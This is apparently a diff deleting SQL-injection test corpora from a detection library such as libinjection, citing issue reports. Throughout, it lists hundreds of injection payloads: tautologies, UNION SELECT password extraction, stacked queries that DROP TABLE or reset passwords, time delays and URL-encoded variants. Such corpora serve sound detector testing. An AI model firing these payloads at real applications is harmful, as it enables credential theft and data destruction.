( (SELECT 'a' OR @a) ) --
|
||||
( (SELECT 'a' LIMIT 1) ) --
|
||||
( (SELECT BINARY ( 1)) ) --
|
||||
( (SELECT BINARY ( SELECT 'b')) ) --
|
||||
( (SELECT BINARY ( COS ( 'b'))) ) --
|
||||
( (SELECT BINARY ( @a)) ) --
|
||||
( (SELECT BINARY COS ( 1)) ) --
|
||||
( (SELECT BINARY COS ( COS ( 'b'))) ) --
|
||||
( (SELECT BINARY COS ( @a)) ) --
|
||||
( (SELECT BINARY BINARY ( 'b')) ) --
|
||||
( (SELECT BINARY BINARY COS ( 'b')) ) --
|
||||
( (SELECT @a OR ( 'b')) ) --
|
||||
( (SELECT @a OR 1) ) --
|
||||
( (SELECT @a OR COS ( 'b')) ) --
|
||||
( (SELECT @a OR @a) ) --
|
||||
( (SELECT @a LIMIT 1) ) --
|
||||
( COS ( 1 OR ( 'b')) ) --
|
||||
( COS ( 1 OR 1) ) --
|
||||
( COS ( 1 OR COS ( 'b')) ) --
|
||||
( COS ( 1 OR @a) ) --
|
||||
( COS ( COS ( ( SELECT 'b'))) ) --
|
||||
( COS ( COS ( BINARY ( 'b'))) ) --
|
||||
( COS ( 'a' OR ( 'b')) ) --
|
||||
( COS ( 'a' OR 1) ) --
|
||||
( COS ( 'a' OR COS ( 'b')) ) --
|
||||
( COS ( 'a' OR @a) ) --
|
||||
( COS ( BINARY ( 1)) ) --
|
||||
( COS ( BINARY ( SELECT 'b')) ) --
|
||||
( COS ( BINARY ( COS ( 'b'))) ) --
|
||||
( COS ( BINARY ( @a)) ) --
|
||||
( COS ( BINARY BINARY ( 'b')) ) --
|
||||
( COS ( BINARY BINARY COS ( 'b')) ) --
|
||||
( COS ( @a OR ( 'b')) ) --
|
||||
( COS ( @a OR 1) ) --
|
||||
( COS ( @a OR COS ( 'b')) ) --
|
||||
( COS ( @a OR @a) ) --
|
||||
( BINARY ( 1 OR 'b') ) --
|
||||
( BINARY ( SELECT ( 'b')) ) --
|
||||
( BINARY ( SELECT 1) ) --
|
||||
( BINARY ( SELECT COS ( 'b')) ) --
|
||||
( BINARY ( SELECT @a) ) --
|
||||
( BINARY ( 'a' OR 'b') ) --
|
||||
( BINARY ( BINARY COS ( 'b')) ) --
|
||||
( BINARY ( @a OR 'b') ) --
|
||||
( BINARY COS ( 1 OR 'b') ) --
|
||||
( BINARY COS ( ( SELECT 'b')) ) --
|
||||
( BINARY COS ( 'a' OR 'b') ) --
|
||||
( BINARY COS ( BINARY ( 'b')) ) --
|
||||
( BINARY COS ( BINARY COS ( 'b')) ) --
|
||||
( BINARY COS ( @a OR 'b') ) --
|
||||
( BINARY BINARY ( 1) ) --
|
||||
( BINARY BINARY ( SELECT 'b') ) --
|
||||
( BINARY BINARY ( COS ( 'b')) ) --
|
||||
( BINARY BINARY ( @a) ) --
|
||||
( BINARY BINARY COS ( 1) ) --
|
||||
( BINARY BINARY COS ( COS ( 'b')) ) --
|
||||
( BINARY BINARY COS ( @a) ) --
|
||||
( BINARY BINARY BINARY ( 'b') ) --
|
||||
( BINARY BINARY BINARY COS ( 'b') ) --
|
||||
( @a in ( BINARY COS ( 'b')) ) --
|
||||
( 1 OR ( BINARY ( 'b')) ) --
|
||||
( 1 OR ( BINARY COS ( 'b')) ) --
|
||||
( 1 OR COS ( BINARY ( 'b')) ) --
|
||||
( 1 ) in ( BINARY ( 'b') ) --
|
||||
( 1 in ( BINARY BINARY ( 'b')) ) --
|
||||
( 1 * COS ( BINARY ( 'b')) ) --
|
||||
( (SELECT ( 1 OR ( 'b'))) ) --
|
||||
( (SELECT ( 1 OR 1)) ) --
|
||||
( (SELECT ( 1 OR COS ( 'b'))) ) --
|
||||
( (SELECT ( 1 OR @a)) ) --
|
||||
( (SELECT ( SELECT 1 OR 'b')) ) --
|
||||
( (SELECT ( SELECT 'a' OR 'b')) ) --
|
||||
( (SELECT ( SELECT BINARY ( 'b'))) ) --
|
||||
( (SELECT ( SELECT BINARY COS ( 'b'))) ) --
|
||||
( (SELECT ( SELECT @a OR 'b')) ) --
|
||||
( (SELECT ( COS ( ( SELECT 'b')))) ) --
|
||||
( (SELECT ( COS ( BINARY ( 'b')))) ) --
|
||||
( (SELECT ( 'a' OR ( 'b'))) ) --
|
||||
( (SELECT ( 'a' OR 1)) ) --
|
||||
( (SELECT ( 'a' OR COS ( 'b'))) ) --
|
||||
( (SELECT ( 'a' OR @a)) ) --
|
||||
( (SELECT ( BINARY ( 1))) ) --
|
||||
( (SELECT ( BINARY ( SELECT 'b'))) ) --
|
||||
( (SELECT ( BINARY ( COS ( 'b')))) ) --
|
||||
( (SELECT ( BINARY ( @a))) ) --
|
||||
( (SELECT ( BINARY BINARY ( 'b'))) ) --
|
||||
( (SELECT ( BINARY BINARY COS ( 'b'))) ) --
|
||||
( (SELECT ( @a OR ( 'b'))) ) --
|
||||
( (SELECT ( @a OR 1)) ) --
|
||||
( (SELECT ( @a OR COS ( 'b'))) ) --
|
||||
( (SELECT ( @a OR @a)) ) --
|
||||
( (SELECT 1 OR ( 1)) ) --
|
||||
( (SELECT 1 OR ( COS ( 'b'))) ) --
|
||||
( (SELECT 1 OR ( @a)) ) --
|
||||
( (SELECT 1 OR 1 * 'b') ) --
|
||||
( (SELECT 1 OR 'a' * 'b') ) --
|
||||
( (SELECT 1 OR @a * 'b') ) --
|
||||
( (SELECT 1 ) OR ( 'b') ) --
|
||||
( (SELECT 1 ) OR COS ( 'b') ) --
|
||||
( ( SELECT 1 ) OR 'b' ) --
|
||||
( (SELECT 1 UNION ( SELECT 'b')) ) --
|
||||
( (SELECT 1 in ( BINARY ( 'b'))) ) --
|
||||
( (SELECT COS ( ( SELECT ( 'b')))) ) --
|
||||
( (SELECT COS ( ( SELECT 1))) ) --
|
||||
( (SELECT COS ( ( SELECT COS ( 'b')))) ) --
|
||||
( (SELECT COS ( ( SELECT @a))) ) --
|
||||
( (SELECT COS ( BINARY BINARY ( 'b'))) ) --
|
||||
( (SELECT 'a' OR ( 1)) ) --
|
||||
( (SELECT 'a' OR ( COS ( 'b'))) ) --
|
||||
( (SELECT 'a' OR ( @a)) ) --
|
||||
( (SELECT 'a' OR 1 * 'b') ) --
|
||||
( (SELECT 'a' OR 'a' * 'b') ) --
|
||||
( (SELECT 'a' OR @a * 'b') ) --
|
||||
( (SELECT 'a' ) OR ( 'b') ) --
|
||||
( (SELECT 'a' ) OR COS ( 'b') ) --
|
||||
( ( SELECT 'a' ) OR 'b' ) --
|
||||
( (SELECT 'a' UNION ( SELECT 'b')) ) --
|
||||
( (SELECT 'a' in ( BINARY ( 'b'))) ) --
|
||||
( (SELECT BINARY ( 1 OR 'b')) ) --
|
||||
( (SELECT BINARY ( 1 * 'b')) ) --
|
||||
( (SELECT BINARY ( SELECT ( 'b'))) ) --
|
||||
( (SELECT BINARY ( SELECT 1)) ) --
|
||||
( (SELECT BINARY ( SELECT COS ( 'b'))) ) --
|
||||
( (SELECT BINARY ( SELECT @a)) ) --
|
||||
( (SELECT BINARY ( 'a' OR 'b')) ) --
|
||||
( (SELECT BINARY ( 'a' * 'b')) ) --
|
||||
( (SELECT BINARY ( BINARY ( 'b'))) ) --
|
||||
( (SELECT BINARY ( BINARY COS ( 'b'))) ) --
|
||||
( (SELECT BINARY ( @a OR 'b')) ) --
|
||||
( (SELECT BINARY ( @a * 'b')) ) --
|
||||
( (SELECT BINARY COS ( ( SELECT 'b'))) ) --
|
||||
( (SELECT BINARY COS ( BINARY ( 'b'))) ) --
|
||||
( (SELECT BINARY BINARY ( 1)) ) --
|
||||
( (SELECT BINARY BINARY ( SELECT 'b')) ) --
|
||||
( (SELECT BINARY BINARY ( COS ( 'b'))) ) --
|
||||
( (SELECT BINARY BINARY ( @a)) ) --
|
||||
( (SELECT BINARY BINARY BINARY ( 'b')) ) --
|
||||
( (SELECT BINARY BINARY BINARY COS ( 'b')) ) --
|
||||
( (SELECT @a OR ( 1)) ) --
|
||||
( (SELECT @a OR ( COS ( 'b'))) ) --
|
||||
( (SELECT @a OR ( @a)) ) --
|
||||
( (SELECT @a OR 1 * 'b') ) --
|
||||
( (SELECT @a OR 'a' * 'b') ) --
|
||||
( (SELECT @a OR @a * 'b') ) --
|
||||
( (SELECT @a ) OR ( 'b') ) --
|
||||
( (SELECT @a ) OR COS ( 'b') ) --
|
||||
( ( SELECT @a ) OR 'b' ) --
|
||||
( (SELECT @a UNION ( SELECT 'b')) ) --
|
||||
( (SELECT @a in ( BINARY ( 'b'))) ) --
|
||||
( COS ( ( SELECT ( SELECT 'b'))) ) --
|
||||
( COS ( ( SELECT 1 OR 'b')) ) --
|
||||
( COS ( ( SELECT 'a' OR 'b')) ) --
|
||||
( COS ( ( SELECT BINARY ( 'b'))) ) --
|
||||
( COS ( ( SELECT BINARY COS ( 'b'))) ) --
|
||||
( COS ( ( SELECT @a OR 'b')) ) --
|
||||
( COS ( BINARY ( BINARY ( 'b'))) ) --
|
||||
( COS ( BINARY BINARY BINARY ( 'b')) ) --
|
||||
( 'a' OR ( BINARY ( 'b')) ) --
|
||||
( 'a' OR ( BINARY COS ( 'b')) ) --
|
||||
( 'a' OR COS ( BINARY ( 'b')) ) --
|
||||
( 'a' ) in ( BINARY ( 'b') ) --
|
||||
( 'a' * COS ( BINARY ( 'b')) ) --
|
||||
( BINARY ( 1 OR ( 'b')) ) --
|
||||
( BINARY ( 1 OR 1) ) --
|
||||
( BINARY ( 1 OR COS ( 'b')) ) --
|
||||
( BINARY ( 1 OR @a) ) --
|
||||
( BINARY ( 1 ) OR 'b' ) --
|
||||
( BINARY ( SELECT ( 1)) ) --
|
||||
( BINARY ( SELECT ( SELECT 'b')) ) --
|
||||
( BINARY ( SELECT ( COS ( 'b'))) ) --
|
||||
( BINARY ( SELECT ( @a)) ) --
|
||||
( BINARY ( SELECT 1 OR 'b') ) --
|
||||
( BINARY ( SELECT 1 * 'b') ) --
|
||||
( BINARY ( SELECT 'a' OR 'b') ) --
|
||||
( BINARY ( SELECT 'a' * 'b') ) --
|
||||
( BINARY ( SELECT BINARY ( 'b')) ) --
|
||||
( BINARY ( SELECT BINARY COS ( 'b')) ) --
|
||||
( BINARY ( SELECT @a OR 'b') ) --
|
||||
( BINARY ( SELECT @a * 'b') ) --
|
||||
( BINARY ( COS ( ( SELECT 'b'))) ) --
|
||||
( BINARY ( COS ( BINARY ( 'b'))) ) --
|
||||
( BINARY ( 'a' OR ( 'b')) ) --
|
||||
( BINARY ( 'a' OR 1) ) --
|
||||
( BINARY ( 'a' OR COS ( 'b')) ) --
|
||||
( BINARY ( 'a' OR @a) ) --
|
||||
( BINARY ( 'a' ) OR 'b' ) --
|
||||
( BINARY ( BINARY ( SELECT 'b')) ) --
|
||||
( BINARY ( BINARY BINARY ( 'b')) ) --
|
||||
( BINARY ( BINARY BINARY COS ( 'b')) ) --
|
||||
( BINARY ( @a OR ( 'b')) ) --
|
||||
( BINARY ( @a OR 1) ) --
|
||||
( BINARY ( @a OR COS ( 'b')) ) --
|
||||
( BINARY ( @a OR @a) ) --
|
||||
( BINARY ( @a ) OR 'b' ) --
|
||||
( BINARY COS ( ( SELECT ( 'b'))) ) --
|
||||
( BINARY COS ( ( SELECT 1)) ) --
|
||||
( BINARY COS ( ( SELECT COS ( 'b'))) ) --
|
||||
( BINARY COS ( ( SELECT @a)) ) --
|
||||
( BINARY COS ( BINARY BINARY ( 'b')) ) --
|
||||
( BINARY BINARY ( 1 OR 'b') ) --
|
||||
( BINARY BINARY ( 1 * 'b') ) --
|
||||
( BINARY BINARY ( SELECT ( 'b')) ) --
|
||||
( BINARY BINARY ( SELECT 1) ) --
|
||||
( BINARY BINARY ( SELECT COS ( 'b')) ) --
|
||||
( BINARY BINARY ( SELECT @a) ) --
|
||||
( BINARY BINARY ( 'a' OR 'b') ) --
|
||||
( BINARY BINARY ( 'a' * 'b') ) --
|
||||
( BINARY BINARY ( BINARY ( 'b')) ) --
|
||||
( BINARY BINARY ( BINARY COS ( 'b')) ) --
|
||||
( BINARY BINARY ( @a OR 'b') ) --
|
||||
( BINARY BINARY ( @a * 'b') ) --
|
||||
( BINARY BINARY COS ( ( SELECT 'b')) ) --
|
||||
( BINARY BINARY COS ( BINARY ( 'b')) ) --
|
||||
( BINARY BINARY BINARY ( 1) ) --
|
||||
( BINARY BINARY BINARY ( SELECT 'b') ) --
|
||||
( BINARY BINARY BINARY ( COS ( 'b')) ) --
|
||||
( BINARY BINARY BINARY ( @a) ) --
|
||||
( BINARY BINARY BINARY BINARY ( 'b') ) --
|
||||
( BINARY BINARY BINARY BINARY COS ( 'b') ) --
|
||||
( @a OR ( BINARY ( 'b')) ) --
|
||||
( @a OR ( BINARY COS ( 'b')) ) --
|
||||
( @a OR COS ( BINARY ( 'b')) ) --
|
||||
( @a ) in ( BINARY ( 'b') ) --
|
||||
( @a in ( BINARY BINARY ( 'b')) ) --
|
||||
( @a * COS ( BINARY ( 'b')) ) --
|
||||
( 1 - (SELECT BINARY ( 1)) ) --
|
||||
( 1 - BINARY ( SELECT 1) ) --
|
||||
( 1 - BINARY COS ( ( 1)) ) --
|
||||
( 1 - BINARY BINARY ( 1) ) --
|
||||
( 1 - BINARY BINARY COS ( 1) ) --
|
||||
( 1 - BINARY BINARY BINARY ( 'b') ) --
|
||||
( 'a' or (SELECT BINARY ( 'b')) ) --
|
||||
( 'a' or BINARY ( SELECT 'b') ) --
|
||||
( 'a' or BINARY COS ( 1) ) --
|
||||
( 'a' or BINARY BINARY ( 'b') ) --
|
||||
( 'a' or BINARY BINARY COS ( 'b') ) --
|
||||
( 1 IN (1) or (SELECT BINARY ( 'b')) ) --
|
||||
( 1 IN (1) or BINARY ( SELECT 'b') ) --
|
||||
( 1 IN (1) or BINARY COS ( 1) ) --
|
||||
( 1 IN (1) or BINARY BINARY ( 'b') ) --
|
||||
( 1 IN (1) or BINARY BINARY COS ( 'b') ) --
|
||||
(select 1 from dual union select 1 limit 1) --
|
||||
(select 1); (select 1); update users set password = 99
|
||||
(select 1); select 1; update users set password = 99
|
||||
select 1; (select 1); update users set password = 99
|
||||
1; update users set password=1
|
||||
( (SELECT 'b') ) ; UPDATE user set password = 99;
|
||||
( (SELECT @a) ) ; UPDATE user set password = 99;
|
|
@ -1,6 +0,0 @@
|
|||
# https://github.com/client9/libinjection/issues/110
|
||||
# lots of great details in this ticket HT: @lifeforms
|
||||
|
||||
id having (1 or 1)
|
||||
id having (1 or true)
|
||||
id having (true or 1)
|
|
@ -1,4 +0,0 @@
|
|||
# https://github.com/client9/libinjection/issues/114
|
||||
# ht @sshayb
|
||||
|
||||
; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2
|
|
@ -1 +0,0 @@
|
|||
name=David' AND 2259=DBMS_UTILITY.SQLID_TO_SQLHASH((CHR(113)||CHR(113)||CHR(122)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (2259=2259) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(112)||CHR(118)||CHR(113))) AND 'XrMo' LIKE 'XrMo
|
|
@ -1,11 +0,0 @@
|
|||
# https://github.com/client9/libinjection/issues/125 HT @d0znpp
|
||||
|
||||
"-sqlite_version() UNION SELECT password FROM users- --
|
||||
1337) INTO OUTFILE ‘xxx’--
|
||||
123);DROP TABLE users--
|
||||
) OR (SELECT password FROM users ...
|
||||
|
||||
# the following don't fit into the libinjection model and are
|
||||
# best handled in another layer, at least for now.
|
||||
#)-sleep(9999
|
||||
#*/UNION SELECT password FROM users--
|
|
@ -1,3 +0,0 @@
|
|||
# https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/782
|
||||
|
||||
.1or-UTC_DATE--
|
|
@ -1,265 +0,0 @@
|
|||
1%20AND%20%28select%20DCount%28last%28username%29
|
||||
1%29%20from%20users%20where%20username%3D%27ad1min%27%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20substr%28id%2C%40a%2C%40v%29%20from%20users%20limit%201%2C1%29
|
||||
%28select%20substr%20%28id%2C%40a%2C%40v%29%20from%20users%20limit%201%2C1%29
|
||||
%28select%20login/2%20from%20users%20limit%201%2C1%29
|
||||
%28select%20login/2%20%0D%0A%0D%0Afrom%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20substr%0D%0A%28login%0D%0A%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
|
||||
union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
0x00%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
0x30%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
0x3%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-0union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-.1union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-.1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-.1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20table_name%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
%28select%20substr%0D%0A%28login%0D%0A%2C1%0D%0A%2C%0D%0A2%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
|
||||
%28select%20substr%0D%0A%28login%0D%0A%2C1%0D%0A%2C%0D%0A2%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
|
||||
%28select%20substr%0D%0A%28login%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
|
||||
%28select%20substr%0D%0A%28login%0D%0A%2C%0D%0A%0D%0A1%0D%0A%0D%0A%2C%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A1%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
|
||||
%28select%20substr%0D%0A%28login%0D%0A%2C
|
||||
%28select%20substr%28login%0D%0A%29
|
||||
%28select%20substr%28login%29
|
||||
%28select%20substr%28login%29%0D%0Afrom%20users%20limit%201%2C1%29
|
||||
##%28select%20asd%28login%29%0D%0Afrom%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
/%2A%20BAR%20%2A/%20UNION%20ALL%20SELECT%20%282%2C3%2C4%29
|
||||
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
|
||||
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
|
||||
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
|
||||
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
|
||||
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
|
||||
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
|
||||
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
|
||||
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
|
||||
%27%20or%201%3D1%20or%20%27
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
0x1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%27foo%27%20%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
oo%27%20%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
a%0D%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
id%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
xxx%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
xxx%20union%20%28select%201%20from%20users%20limit%201%2C1%29
|
||||
xxx%20union%20%28select%20xxx%20from%20users%20limit%201%2C1%29
|
||||
oo%27%20%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
xxx%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%27s%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%27s%27%20union%20%28select%201%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%22%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1a%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1a%22%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1a%27%22%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1a%23%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23aaaaa%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%231aaaaa%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%231a%23%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23%231a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23--1a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23--%20-1a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%27s%27%20union%20%28select%201%20from%20users%20limit%201%2C1%29
|
||||
xxx%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%27s%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%27s%27%20union%20%28select%201%20from%20users%20limit%201%2C1%29
|
||||
-1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
